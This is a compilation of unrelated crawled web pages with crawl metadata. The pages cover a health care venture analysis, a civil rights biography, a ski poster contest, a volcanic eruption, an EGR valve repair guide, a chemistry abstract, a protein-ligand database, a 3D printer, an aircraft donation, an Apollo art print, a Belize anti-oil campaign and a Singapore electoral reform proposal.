JP Morgan Chase do discover a way to reduce their own internal costs, it’s still difficult to span the chasm from internal cost-cutting to influencing the broader health care environment. That said, if the three companies intend to play the long game and don’t have to worry about immediate results beyond their own internal focus, things could play out in several different ways. “Fix” internal, stay internal Once they understand the obstacles to expanding into the broader market, Amazon, Berkshire Hathaway, and JP Morgan Chase could pull their resources together, simply decide to tackle internal health care costs, and leave it at that. Given the ambitious nature of their announcement and the reputations of each company, this is the least likely scenario. “Fix” internal, start own insurance(-ish) plan While working to reduce their own internal costs, the three companies could feasibly develop a new type of insurance plan or program: one that focuses on the particular needs and issues of operations at large international companies. This is a possible outcome, though not probable. “Fix” internal, sell technology solutions Given the way Amazon has reinvented the online marketplace—in 2017, they dominated by capturing 44% of all online sales in the US—this new venture could develop into a technology magnet for other elements of the health care industry. This seems to be the most likely outcome, especially since Amazon possesses the know-how and capabilities to reshape the way customers interact with embedded systems. Paired with Berkshire Hathaway’s involvement in health care reinsurance (essentially, a backstop for health insurance companies) and JP Morgan Chase’s financing arm, this seems like a plausible end-point. The exact nature and timing of such a development is unknown. First, these three companies will have to figure out how to bend their own cost curves before others will be drawn to any external plans they offer. The technologies that Amazon, Berkshire Hathaway, and JP Morgan could employ range from: - Simply having better, more actionable data to track and reduce their costs - Creating a system to automatically track and negotiate or reduce health care expenses Talk about a wide-open scenario. Some have jumped to extremes when examining the possible influence of this partnership on health care as a whole. Given the size of the three companies involved, their available investment capital, and the possibility of an entirely new company driving innovation, the long-term approach taken by Amazon, Berkshire Hathaway, and JP Morgan Chase could change the underlying health care landscape. Will hospitals and clinics deliver more care via telehealth? Will that negatively or positively impact patients? No clear answers exist yet. The bigger shift will come from the way that consumers interact with health care systems—and the way those systems interact with individual consumers, as well.
<urn:uuid:76e0877a-c6a9-422b-a7ce-0c1b87411817>
CC-MAIN-2022-33
https://accelerate.uofuhealth.utah.edu/improvement/zac-watne-unraveling-amazon-and-friends
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570741.21/warc/CC-MAIN-20220808001418-20220808031418-00071.warc.gz
en
0.946519
1,072
1.59375
2
Bernice Smith White Bernice Smith White was born in Maryland on February 27, 1924. White is known as a community worker, civic leader, educator, and a leader in the struggle for equal rights for women. She was educated in the Baltimore City Public Schools, and received her B.S. degree in Education from Coppin State College (formerly known as Coppin Teacher's College). She furthered her education in the fields of political science, government, personnel management, behavioral aspects of management, labor relations, and equal opportunity from Morgan State University, Community College of Baltimore, George Washington University , University of Maryland, and Fisk University. She taught in the Baltimore school system for about 12 years. Her interest in young people led her to the Baltimore Urban League where she became active as a volunteer in programs to provide job opportunities for youths. As a result of her research and studies about the school dropout rate, she conducted a local radio program Radio WEBB. She later left the school system to embark on a career to prove that women could succeed in other fields. As the first Director of Community Education and Relations of the Baltimore City Community Relation Commission, she worked tirelessly to bring her organization's message to Maryland. She interpreted the City's civil rights law for the public via radio, television, movies, print media, workshops, and conferences. This experience led to her appointment as the first woman Insurance Compliance Specialist for the Social Security Administration. In this position, she traveled across the country monitoring affirmative action programs of government Medicare contractors to ensure equality of opportunity for minorities and women. In July, 1969, she was appointed one of the only three full-time National Directors of the Federal Women's Program which was established under Executive Order of the President. Through her work in this program, Bernice became a recognized authority in the field and served as a consultant and resource person for the former U.S. Civil Service Commission. She lectured locally and nationally at conferences, workshops, and schools. In October, 1972, she was promoted to the position of Community Relations Officer for Social Security Administration - again another first. Due to the growth of activities in this area, a Community Relations Staff was created and she was named Chief of the Headquarters Coordination and Liaison Staff, Office of Governmental Affairs. This staff served as the primary source of advice and information regarding the public's position and opinions on SSA Entitlement Programs. She retired from the Social Security Administration in May, 1984. She found that, although it is difficult, a woman can succeed in this so-called "man's world." It was out of this that she created the title for her weekly column in the Baltimore Afro American, "It's Not A Man's World." She gained national recognition because of this column and the wealth of information it contained. She was guest columnist from 1969-1974. Bernice found time to be very active in voter registration and voter education programs and in many aspects of the political life of the Baltimore community. Through her affiliation with Woman Power, she worked with women to make them more politically aware and informed on current issues. She initiated the move to have sex included in the Provisions of Acts of Discrimination in the City Civil Rights Ordinance No. 103. The amendment was passed in August, 1971 and signed into law by the Mayor. Currently, she is the first African-American chair of the Baltimore City Commission for Women. Mrs. White began her tenure with the commission in 1990. In January 1995, the Honorable Kurt L. Schmoke, Mayor of the City of Baltimore, appointed her as chairperson. Her participation in civic, religious, and professional organizations has been long and rewarding. She has held membership on many boards, commissions, and is often sought after to chair or serve on philanthropic ventures and health and welfare fund-raising projects. She was appointed by former Governor Harry Hughes to serve on the Eastern Region Foster Care Review Board for Baltimore City. The Honorable Parris N. Glendening presented a Governor's Citation to her, acknowledging the Valued Hours Award she received from the Fullwood Foundation. Bernice Smith White's continued dedication to creating awareness and cultivating understanding has benefited women in the State of Maryland.
<urn:uuid:e61c0e2f-24c0-4e61-8a20-682ff7e1dec0>
CC-MAIN-2022-33
https://msa.maryland.gov/msa/educ/exhibits/womenshallfame/html/white.html
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570921.9/warc/CC-MAIN-20220809094531-20220809124531-00275.warc.gz
en
0.975633
863
2.25
2
Be Active Learn to Ski! January is National Learn to Ski Month! In support of this initiative, Beech Mountain Resort will hold a (regional, local, national) poster design contest to promote learning to ski and snowboard. Eligibility: The contest is open to all 3rd – 5th grade students (regional, local, national) Dimensions and Form: All entries must be original flat, two-°©] dimensional drawings, paintings, or renderings. No photographs permitted. Posters should be at least 8.5”x11” and can be no larger than 11”x17”. Theme:Poster designs should be derived from the theme. Categories: Male and Female Prizes: 1st: A Beginner Ski or Board Set up (courtesy of FLOW Snowboards and Atomic skis) One full day in the BMR Youth Learning Center Two additional tickets A Helmet and Goggle Setfrom SCOTT Sports 2nd: One lift ticket, rental, and first time beginner lesson at Beech Mountain Resort 3rd: One first time beginner lesson at Beech Mountain Resort Deadline: January 31, 2011 Posters will be displayed at Beech Mountain Resort in the View Haus Cafeteria. The Beech Mountain Resort Staff of certified instructors will judge the entries. Winners will be announced on February 1, 2012. Send entries to: ATTN: Poster Contest Beech Mountain Resort P.O. Box 1118 Beech Mountain, NC 28604 For More Information: Talia Freeman (828)387-°©]2011 ext 205
<urn:uuid:8aedb82b-def3-4441-afd3-48a963379f41>
CC-MAIN-2017-04
http://www.skisoutheast.com/beech-mountain-resort-offers-some-great-incentives-to-learn-to-ski-click-to-enlarge/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00204-ip-10-171-10-70.ec2.internal.warc.gz
en
0.869024
346
1.773438
2
The insight you need, when you need it, anywhere in the world On December 4, 2021, Mount Semeru volcano erupted on Java Island, Indonesia. Semeru, the tallest mountain on Java, spewed ash that blanketed nearby villages and sent people fleeing in panic. The eruption destroyed buildings and severed a bridge connecting two areas in the nearby district of Lumajang, with the city of Malang. As of December 7, the Indonesian disaster agency said the death toll rose to 34, with up to 27 missing. The volcano erupted again on Monday, December 6, and Indonesia’s Center for Volcanology and Geological Hazard Mitigation warned of continued seismic activity. Analysis-Ready Data (ARD) is Maxar's subscription service providing users access to time-series stacks of imagery with specific preprocessing (atmospheric compensation, radiometric correction, orthorectification and alignment) to minimize the work and time required to derive answers from pixels. Learn more about ARD here.
<urn:uuid:d65ef75e-aeda-4af9-b04d-ae5e499d3b79>
CC-MAIN-2022-33
https://www.maxar.com/open-data/mount-semeru-eruption?utm_source=blog&utm_medium=organic&utm_campaign=open-data-indonesia-volcano
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571584.72/warc/CC-MAIN-20220812045352-20220812075352-00677.warc.gz
en
0.926516
204
2.3125
2
Most vehicles are now equipped with an Exhaust Gas Recirculation (EGR) valve to reduce emissions. Several symptoms can point to EGR valve problems: failed emissions test, poor idling, or random changes in engine speed. There are a few methods for testing an EGR if you’re unsure that it’s defective. If the EGR is faulty, it takes only a few steps and tools to replace it. Testing with a Scan Tool 1Use a car scan to test the EGR valve. A scan tool reads information from your On-board Diagnostics, version II (OBD-II) system. This system collects information from the sensors in your engine. If the sensor detects something wrong, it reports it as an error code to the OBD-II. A scan tool allows you to read this code. The scan tool plugs into OBD-II data link connector, which is usually located under the dash. 2Locate the OBD-II data connector. The most common location for the OBD-II connector is under the dash by the steering wheel. The owner's manual should have the exact location if you have trouble finding it. 3Turn the ignition to the on position. Place your key in the ignition and turn it to on, but do not start the engine. You only want the electrical systems running. 4Connect the scan tool to the OBD-II data link connector. The scan tool will prompt you to fill in some information about your vehicle. It usually requires information about the make, model, engine, and year of the vehicle. - Most scan tools draw power from the vehicle’s battery and do not require a separate power source. 5Read the results. The scan tool will display any error codes the OBD-II reports. If the result is in the P0400 to PR409 range, then the EGR valve may be faulty. Testing with a Multimeter 1Use a multimeter to test the EGR valve. A multimeter tests the electrical wiring in your vehicle. The multimeter has a few settings, but you only need to set it to Volts for this test. The multimeter has black (negative) and red (positive) leads with metal clamps that connect to the wiring in your engine. - It’s recommended that you use a digital multimeter for this test. A digital multimeter will display only the test results. An analog multimeter will be harder to read because every possible result on its range is printed at the top. 2Set the multimeter to read Volts. A large “V” denotes the voltage setting. The range for the volts is located between two bold lines. 3Find the EGR valve. Consult your owner’s manual to find the exact location of the valve as it varies depending on the make and model of your vehicle. Once you have located the valve, look for an electrical connector on top of it. This connector will have the circuits you need to test. 4Clip the multimeter’s read lead onto the “C” circuit. Each circuit on the EGR is labeled from "A" to "E." 5Clip the multimeter's negative lead to a ground in the engine. The easiest and closest ground is the negative post on the vehicle’s battery. 6Look the readings. If the results on the multimeter show a reading above .9 Volts, then something (most likely carbon) is blocking the EGR valve. If the multimeter shows little or no voltage, then the EGR valve is most likely faulty. If the reading is between .6 and .9 Volts, then this means the EGR valve is working properly. Replacing The EGR 1Purchase the correct EGR valve for the make and model of your vehicle. Check with your owner’s manual to find the right one. If you cannot find the correct EGR there, check a parts manual or with an associate at an auto parts stores. 2Let your engine cool. Wait for several hours before you begin working on your vehicle. You can injure yourself very easily while working on a hot engine so let it set a few hours. 3Disconnect the battery. Use a wrench to loosen the clamps on the battery’s two terminals. Be sure to wait at least 5 minutes after disconnecting the battery before you begin working on the engine. You want the system to discharge completely. - Always wear the appropriate safety gear before working on your engine. 4Locate the EGR. The EGR is usually located on either the top or backside of the engine. Consult your owner’s manual if you need help finding it. 5Disconnect the vacuum line. Twist and pull each line until they slide off the EGR valve. Each line connects with a specific port. Label each one so that you can easily reconnect them. 6Disconnect the electrical cable. The electrical cable is located on top of the EGR valve. Grab the electrical cable with your hands and pull it. - If the electrical cable is held in by a clip or clamp, use a flat-bladed screwdriver to press it down and release it. 7Use a wrench to remove the bolts on the EGR valve's mount. Use lubricant spray on the bolts because they are usually very tight. 8Take out the old EGR valve. Now that you removed the bolts, use your hands to remove the valve from its mount. - Inspect the valve for signs of carbon buildup. Sometimes this buildup causes the valve to malfunction. If you find buildup, clean it off and reinstall the valve. Test the valve again to see if it works after cleaning it. 9Clean the valve base and passages. Use a scratch awl or something similar to remove any carbon buildup. Clean any debris or building in the gasket case. - Use carburetor or intake cleaner to help remove the carbon. 10Install the new EGR valve. Thread the bolts through the EGR and gasket onto the mount with your hands first. Then use a socket wrench with a swivel extension to tighten the mounting bolts when you seat the EGR valve in the engine. - When purchasing a new valve, see if it comes with a new gasket. You will have to purchase one if it doesn’t. 11Reconnect the electrical cable. Plug the cable back into the top of the EGR valve using your hands. 12Hook up the vacuum line. Reattach the line with using your hands. Make sure that it’s tight to prevent leaks. 13Reconnect the battery. Attach the engine leads to the battery terminals. Use a wrench to tighten the bolts. 14Clear your scan tool. If you used a scan tool to test your EGR valve, clear any error codes related to the valve. Then test again to see if any error codes appear. 15Listen for leaks. Start your engine and listen for any leaks near the EGR valve. The two possible places leaks might occur will be with the vacuum hose or exhaust. Drive the vehicle to make sure that it runs correctly. Pay close attention to the idling and gas mileage of your vehicle as poor performance in these areas indicate that the EGR valve is faulty. - Consult your owner’s manual and write down the security code for your car’s radio, disc player, or display device. Disconnecting the battery will cause the radio to reset and lock, and you will need this code to unlock it. - Always wear safety glasses when working near your car. Things You'll Need - Lubricant Spray - Socket Wrench with swivel extension - Safety Glasses - New EGR valve for your vehicle (if you don't know the part #, an auto parts store or website can help you find it) - OBD2 scan tool (for vehicles built 1996 and later) - Multimeter (auto-ranging is preferred) - Scratch awl - Flat-blade screwdriver Sources and Citations - ↑ http://www.popularmechanics.com/cars/how-to/maintenance/4267896 - ↑ http://easyautodiagnostics.com/gm/4.3L-5.0L-5.7L/egr-valve-tests-1 - ↑ http://www.familyhandyman.com/electrical/how-to-use-a-multimeter/view-all - ↑ http://easyautodiagnostics.com/gm/4.3L-5.0L-5.7L/egr-valve-tests-2 - ↑ http://easyautodiagnostics.com/gm/4.3L-5.0L-5.7L/egr-valve-tests-2 - ↑ http://www.ebay.com/gds/How-to-Replace-EGR-Components-/10000000178532985/g.html - ↑ http://www.carsdirect.com/car-maintenance/egr-valve-cleaning-and-replacement-instructions - ↑ http://www.adrianneyoung.com/serendipity/index.php?/archives/214-How-to-Replace-an-EGR-Valve.html
<urn:uuid:ab03f748-a2fe-4e8a-8fb5-ea2619a96784>
CC-MAIN-2016-44
http://www.wikihow.com/Change-an-EGR-Valve
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988720845.92/warc/CC-MAIN-20161020183840-00085-ip-10-171-6-4.ec2.internal.warc.gz
en
0.888628
1,983
2.796875
3
سال انتشار: ۱۳۹۱ محل انتشار: اولین همایش ملی حفاظت و برنامه ریزی محیط زیست تعداد صفحات: ۶ Kourosh Motevalli – Instructor, Applied Chemistry Department, Fundamental Sciences Faculty, Islamic Azad University Zahra Yaghoubi – Assistant Professor, Industrial Faculty, Islamic Azad University, South Tehran Branch, Tehran, Iran, The photoelectrolysis of water to yield hydrogen and oxygen using visible light has enormous potential for solar energy harvesting if suitable photoelectrode materials can be developed. Few ofthe materials with a band gap suitable for visible light activation have the necessary band edge potentials or photochemical stability to be suitable candidates. Osmium oxide )Ebg =2.8 eV( is a good candidate with absorption up to λ ≈ ۴۴۰ nm and known photochemical stability. Thin filmsof osmium oxide were prepared using an electrolytic route from peroxoosmium precursors. Theosmium oxide thin films were characterised by FESEM, Auger electron spectroscopy, and photoelectrochemical methods. The magnitude of the photocurrent response of the films under solar simulated irradiation showed a dependence on precursor used in the film preparation, with a comparatively lower response for samples containing impurities. The photocurrent response spectrum of the osmium oxide films was more favourable than that recorded for titanium dioxide )TiO2 ( thin films. The OsO3 photocurrent response was of equivalent magnitude but shifted intothe visible region of the spectrum, as compared to that of the TiO2 .
<urn:uuid:35468e1a-9547-4ec6-99be-2a09b55b5c3c>
CC-MAIN-2016-44
http://www.getpaper.ir/a-study-upon-photooxidation-of-water-using-nanocrystalline-osmium-oxide-under-visible-light.htm
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719041.14/warc/CC-MAIN-20161020183839-00169-ip-10-171-6-4.ec2.internal.warc.gz
en
0.823402
414
2.171875
2
MOAD release: 2014 Binding MOAD Statistics 25771 Protein-Ligand Structures 9142 Binding Data 12440 Different Ligands 7599 Different Families Citing Binding MOAD Nucl. Acids Res. Welcome to Binding MOAD! What is Binding MOAD? We have created a subset of the Protein Data Bank (PDB), containing every high-quality example of ligand-protein binding. Hence, we call it the Mother of All Databases (MOAD). Binding MOAD's goal is to be the largest collection of well resolved protein crystal structures with clearly identified biologically relevant ligands annotated with experimentally determined binding data extracted from literature. Binding MOAD Criteria for inclusion: ...biologically relevant ligands... Ligands may be a peptide of 10 amino acids or less oligonucleotide of 4 nucleotides or less small organic molecule (e.g. ibuprofen) cofactor (e.g. NADPH) Ligands are not: crystallographic additives (e.g. polythylene glycol) buffers (e.g. Tris, CHAPS) metals (e.g. Rb metallic catalytic centers (e.g. FeS, NiFe) solvents (e.g. DMSO) has a resolution of 2.5 Å or better ...binding data extracted from literature We've searched through the primary reference of each PDB entry looking for Kd, Ki, and IC50 data. If we've got something wrong or if you have something to add, Please let us know - we'll correct it, and give you credit. NOTE: - We have gone through all the single HET group ligands and updated the SMILES to the current PDB Component Dictionary OpenEye Cannonical form. - In order to properly view the website, please make sure Java is installed on your system and java script is enabled on your browser (see FAQ). Cite Binding MOAD: L Hu, ML Benson, RD Smith, MG Lerner, HA Carlson. Binding MOAD (Mother Of All Databases). A. Ahmed, RD Smith, JJ Clark, JB Dunbar, HA Carlson. Recent improvements to Binding MOAD: a resource for proteinligand binding affinities and structures. Nucl. Acids Res. ML Benson, RD Smith, NA Khazanov, B Dimcheff, J Beaver, P Dresslar, J Nerothin, and HA Carlson. Binding MOAD, A high-quality protein-ligand database. Nucleic Acids Research University of Michigan
<urn:uuid:7288a4c0-bc8f-4fb0-a5bb-0ee188f70432>
CC-MAIN-2016-44
http://www.bindingmoad.org/
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988720962.53/warc/CC-MAIN-20161020183840-00386-ip-10-171-6-4.ec2.internal.warc.gz
en
0.748073
573
1.984375
2
Explain the auditor’s responsibility to consider compliance with laws and regulations. How does this responsibility differ for laws and regulations that have a direct effect on the financial statements compared to other laws and regulations that do not have a direct effect? Answer to relevant QuestionsWhat is the auditor’s responsibility when noncompliance with laws or regulations is identified or suspected? What is meant by using benchmarks for setting a preliminary judgment about materiality? How will those benchmarks differ for the audit of a manufacturing company and a government unit such as a school district?Ling, an audit manager, is planning the audit of Modern Technologies, Inc., (MT, Inc.) a manufacturer of electronic components. This is the first year that Ling’s audit firm has performed the audit for MT, Inc. Ling set ...Companies and auditors now operate in a global environment and need to be aware of potential risks that stem from subsidiaries, business partners, and network firms located outside the U.S. In the past decade, we have ...Auditors often have to test the effectiveness of infrequently operating controls, such as monthly closing and reconciliation processes. Determining the appropriate extent of testing of such controls presents unique ... Post your question
<urn:uuid:222efbe7-fbf9-461a-bfaf-c8d88f0f9200>
CC-MAIN-2017-04
http://www.solutioninn.com/explain-the-auditors-responsibility-to-consider-compliance-with-laws-and
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00205-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956097
246
2.421875
2
We have introduced several home 3D printers, but if you need more functions, the following FABtotum personal fabricator should be able to catch your eyes. The FABtotum is a multi functional personal fabrication device that comes in three sizes for different purposes. Unlike a normal 3D printer, the personal fabricator features an awesome combination of 3D printer, 3D scanner, and milling machine. Using its FFF technique (Fused Filament Fabrication) FABtotum is cable to high speed print 3D models with PLA/ABS, and built-in heated bed prints will proceed smoothly for higher quality models, moreover, its dual head with an engraving/milling spindle motor make the 3D printing work with many common materials such as wood, light aluminum or brass alloys. Moreover, the fabrication device is also a 3D scanner, using its built-in laser scanner FABtotum can acquire both small and complex objects, with the help of its 3D printing feature, you don’t worry about having enough 3D creations to fill your showcase. Apart from that, as a milling machine FABtotum even can help you make your own circuit boards. Additionally, the fabricator not only can be controlled via a computer, but also be operated via LAN, wireless LAN and remotely from the Internet, and as an open source project developers can easily bring more functions for the combo of 3D printer, 3D scanner and milling machine. After the break, check out the following demo video. At present the team of FABtotum is raising fund at Indiegogo. Pledging $999 will let you own the fabrication device. If you’re interested, jump to Indiegogo official site for more details.
<urn:uuid:98f6e1bf-50c3-4ff9-a6c8-72d7bfb377f7>
CC-MAIN-2022-33
https://gadgetsin.com/fabtotum-personal-fabricator-with-3d-printer-and-3d-scanner.htm
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571284.54/warc/CC-MAIN-20220811103305-20220811133305-00475.warc.gz
en
0.923578
373
1.515625
2
Accession Number : AD0801854 Title : EUROPEAN NUCLEAR ENERGY AGENCY: ITS FUNCTIONS AND BACKGROUND. Descriptive Note : Technical rept., Corporate Author : OFFICE OF NAVAL RESEARCH LONDON (UNITED KINGDOM) Personal Author(s) : Hemann, John W. Report Date : OCT 1966 Pagination or Media Count : 29 Abstract : This report describes the organization of the European Nuclear Energy Agency (ENEA) under the Organization for Economic Cooperation and Development (ECD), shows how its three joint projects (Eurochemic, Halden, and Dragon) are administered, and gives a brief description of their major technical features. (Author) Descriptors : (*NUCLEAR ENERGY, EUROPE), (*NUCLEAR INDUSTRIAL APPLICATIONS, EUROPE), SCIENTIFIC ORGANIZATIONS, ECONOMICS, RESEARCH MANAGEMENT, NUCLEAR REACTORS, ELECTRIC POWER PRODUCTION, NUCLEAR REACTORS, PERFORMANCE(ENGINEERING), NUCLEAR PHYSICS. Subject Categories : Mfg & Industrial Eng & Control of Product Sys Nuclear Physics & Elementary Particle Physics Distribution Statement : APPROVED FOR PUBLIC RELEASE
<urn:uuid:822540c2-f53a-411b-afbe-4cff868cfcad>
CC-MAIN-2017-04
http://oai.dtic.mil/oai/oai?verb=getRecord&metadataPrefix=html&identifier=AD0801854
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00336-ip-10-171-10-70.ec2.internal.warc.gz
en
0.67499
281
1.5625
2
ENGINEERS are reaching for the sky thanks to the boss of a top UK airline. Generous Jet2.com Chairman Philip Meeson has presented Coleg Cambria with a Jet Provost T5 aircraft. Mr Meeson, whose nephew is completing an aerospace apprenticeship with Cambria and Broughton-based wingmakers Airbus, donated his own personal jet to the college’s Deeside campus. Nick Tyson, Assistant Principal and Director of Learning, said the plane will add another dimension to the award-winning department’s innovative delivery of work-based learning. He thanked Mr Meeson for the gift, and added: “Having the Provost T5 on campus is a major selling point for our engineering courses as it gives students hands-on experience of working on an airplane. “We can use it to train our aerospace apprentices – of which we have more than 180 every year – and those studying on our higher education programmes and summer school qualifications. “They’ll be able to look at structures, carry out live aircraft function testing and work out aircraft processes directly, so it will be incredible training for them. “I would like to thank Mr Meeson and for his kindness, we all appreciate his generosity and look forward to many years of working on the jet plane.” The Provost was used by the Royal Air Force from 1955 to 1993 as a British training jet before later being developed into a more heavily armed version for ground attack missions. With a maximum speed of almost 440mph, the aircraft is around 40ft long with a wingspan of 35ft. Mr Meeson said: “I am very proud and pleased to donate my Jet Provost aircraft to Coleg Cambria and that it will be used to train Airbus apprentices. “I know the college provides a fantastic start for the Airbus engineers of the future and I am delighted to have been able to make this contribution.” The addition of the jet comes after the Engineering department hosted the prestigious two-day EEF (Engineering Employers Federation) conference at Cambria’s new £10m Bersham Road facility in Wrexham. Up to 25 further education lecturers came together for a packed programme of workshops and activities centred on best practice and innovative learning methods, including an advanced manufacturing visit to Airbus. For more information on the wide selection of courses and apprenticeships in Engineering at Coleg Cambria, and the summer school programme, click here.Recommend0 recommendationsPublished in
<urn:uuid:6a8c1c40-b63c-4c30-8e68-18018f60bd7f>
CC-MAIN-2022-33
https://www.fenews.co.uk/skills/airline-boss-donates-private-jet-to-college-engineers/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573197.34/warc/CC-MAIN-20220818124424-20220818154424-00668.warc.gz
en
0.948717
522
1.710938
2
We were saddened to hear of the death of astronaut Edgar Mitchell, the last surviving member of Apollo 14, on February 4th, 45 years from the his mission to the moon, which ran from Jan. 31 to Feb. 9, 1971. Mitchell was 85 years old. He retired from NASA and the Navy in 1972. Mitchell was the lunar module pilot, the job held by artist and astronaut Alan Bean in the Apollo 12 mission. . The rest of the crew was commander Alan Shepard, and command module pilot Stuart Roosa. Alan Bean painted several scenes from Apollo 14 including “Big Al and His Rickshaw” (Alan Shepard and the modularized equipment transport which was the first wheeled vehicle on the moon), “Sunrise Over Antares,” and perhaps most famously, “In Flight,” Alan Shepard’s golf swing with Ed Mitchell’s commentary. The Greenwich Workshop was proud to publish “Hello Universe”, a single representative astronaut in a spirited gesture of joy and wonder, in a fine art limited edition print, signed by Alan Bean, Eugene A. Cernan and Edgar D. Mitchell. “Here we are, humans of planet Earth, standing on our only moon. Getting there wasn’t easy; in fact, it took about four hundred thousand of us giving our best efforts. None could do it alone but together we found a way to achieve this seemingly impossible dream. When the time is right, we will be ready to continue our noble quest to expand humanity’s reach. Our children and our children’s children will have to continue the search, each succeeding generation moving a little farther out, discovering more answers and even greater questions. The Universe awaits our audacious human spirit. Be patient . . . we are coming.” Countersigners: Eugene A. Cernan and Edgar D. Mitchell.
<urn:uuid:c0370b67-ac08-422d-8109-161eae2758e5>
CC-MAIN-2022-33
https://www.picturethisgallery.com/art/hello-universe/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571993.68/warc/CC-MAIN-20220814022847-20220814052847-00676.warc.gz
en
0.947082
400
2.265625
2
Public Presentation at the Lion's Den on Tuesday, June 14, 2011 at 7pm. The Great News is that we have reached the 17,000 signatures needed to trigger a referendum on oil exploration offshore and in protected areas. Now the real work begins. We need to get the voting population of Belize out to vote. The Belize Coalition is embarking on an outreach campaign to inform the voting population of the negative impacts of oil exploration in Belize. The Belize Coalition are planning public presentations throughout the country. The Ambergris Caye Citizens for Sustainable Development is working together with them on their first presentation here in San Pedro. We take this opportunity to invite you to attend this presentation on Tuesday, June 14th, 2011 at the Lion's Den at 7 Why we are against Offshore Oil Drilling in Belize: Just a few of our legal concerns: Sign Petitions at our office upstairs Blu Gift Shop or print the one attached to the bottom of this page and have all your friends sign it. Economic Impacts of offshore drilling and exploration - presentation written by Mr. Edilberto Romero of APAMO Mayor Elsa Paz of San Pedro made a call to the Island's Reef Radio during a talk show hosting members of the coalition, to express her support for the initiative. A day later, Vice-President of Oceana, Audrey Matura-Shepherd is praising Mayor Paz's declaration of support and calls it a bold and decisive action that will give important momentum to their cause. Matura-Shepherd says the Mayor' backing is already reaping benefits for the coalition in a petition drive to collect signatures. Audrey Matura-Shepherd, Vice-President, OCEANA Belize Coalition to Save our Natural Heritage Urgent action needed TO PROTECT Our Barrier Reef Reserve System and our Protected Areas from Oil Exploration and Drilling June 8, 2010 Considering that there has been complete parceling out of the entire country of Belize, except for the Maya Mountain, for oil exploration and drilling, it has become necessary for members of civil society to join forces and unite under one Coalition to be able to approach the Government on behalf of the people of Belize. The Belize Coalition to Save Our Natural Heritage is to be a conduit of the voice of the masses and will at all times have the best interest of Belize and its people at heart. All members have pledged to act without reservation to protect our people and their rights to our natural heritage. The members of the Belize Coalition to Save our Natural Heritage jointly call on the Government of Belize to: A. Adopt a resolution declaring a BAN on OFFSHORE oil exploration and drilling in our Belizean waters; B. Adopt a resolution declaring a BAN on oil exploration and drilling in ALL our PROTECTED AREAS; C. Initiate an open and transparent process to review and strengthen the existing legislations (e.g. Petroleum Act, EIA Regulations and other relevant Acts and Regulations) to regulate oil exploration and drilling in Belize; D. Develop a comprehensive Petroleum Policy and Plan along with an Energy Plan for Belize E. Put in place the necessary measures to effectively monitor and regulate the oil industry in Belize F. Conduct meaningful consultation with the people of Belize prior to the engagement in agreements for oil exploration and drilling in Belize The Coalition is therefore engaging the larger public to participate in the charting of the course that this country will take as it relates to the future of the oil industry of Belize. As members of civil society the Coalition brings to light the following concerns: 1. That oil exploration and drilling is a matter of national interest to the people of Belize and as such the people of this nation have not been consulted or involved in this critical national issue; 2. That there is no area in our waters or land, except for the Maya Mountains, spared from oil exploration and drilling in this country; 3. That the integrity of our Belize Barrier Reef System, a World Heritage Site, is being compromised and exposed to an additional pressure and threat; 4. That oil companies are not subjected to the requirements that other businesses and the people of Belize have to abide by within protected areas; 5. That the legal framework in place is not suitable to ensure public safety in the event that there is ever an accident or oil spill; 6. That there is no legal framework in place to ensure that the Belizean public, as a class, have a quick and direct access to the legal system without waiting for an action by the Attorney General; 7. That the monies already being contributed to the economy through tourism and fisheries are being taken for granted when addressing the economic development of Belize through oil development 8. That the lifestyle and cultural rights of our people to the use and enjoyment of our marine resources and protected areas is being 9. That there is no transparency and accountability in the way Government awards concessions and enters into power sharing agreements with oil companies. 10. That the production sharing agreements are not in the best interest of the people of Belize. The Belize Coalition to Save our Natural Heritage, an alliance of over 25 organizations, representing the people of Belize is calling for a BAN on oil exploration and drilling offshore and in all protected areas. We call on ALL Belizeans to support this cause which strikes at the ownership of our heritage. Our livelihoods and lifestyle will be threatened if WE allow oil exploration and drilling in offshore and protected areas.
<urn:uuid:c19bfaf7-fa8d-44e6-92ca-cda30929fb05>
CC-MAIN-2017-04
https://sites.google.com/site/accsdbze/coalition-to-ban-offshore-oil-drilling-in-belize
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00269-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925783
1,178
1.640625
2
The National Solidarity Party (NSP) has called for the Group Representation Constituency (GRC) system to be abolished and replaced by single-seat constituencies, with some reserved for minority MPs. Contituencies reserved for minorities would be determined in the way that the current electoral boundaries are drawn up, the party said in a paper released yesterday. The Constituency Reserved for Minorities (CRM) scheme would ensure multiracial representation in Parliament just as well as GRC but "without most of its major flaws", the NSP said. The scheme is not a new one. It was put up as an alternative proposal during the debate to introduce the GRC system in 1988. But it was rejected on the grounds that some residents would be forced to accept Malay-only candidates and if the minority constituencies were then rotated around to overcome this problem, it would affect the relationship between MP and resident. This was "fallacious reasoning", the NSP said. It acknowledged that the GRC system has succeeded in "enshrining multi-racialism". But it also "hinders political competition, fortifies the incumbents and works against democracy", it added. In Singapore today, winning an election by appealing to voters on the basis of ethnicity is also "highly improbable", it added. NSP's key criticism of the GRC is that it does not abide by the "one-man-one-vote" rule - a voter in a GRC can elect four to six MPs with one vote, while a SMC voter can only elect one. "There is a lack of parity between the weight of the votes," said secretary-general Jeannette Chong-Aruldoss at a press conference yesterday, attended by about 25 people. The CRM scheme would also "lessen allegations of gerrymandering" and not allow new candidates to "ride on the coat-tails of heavyweight candidates" to enter Parliament, the paper said. Yesterday, political analysts said such a scheme would raise the danger of race-based politics. Institute of Policy Studies senior research fellow Gillian Koh said residents who do not want to be "locked into a CRM with a particular racial orientation" may move to 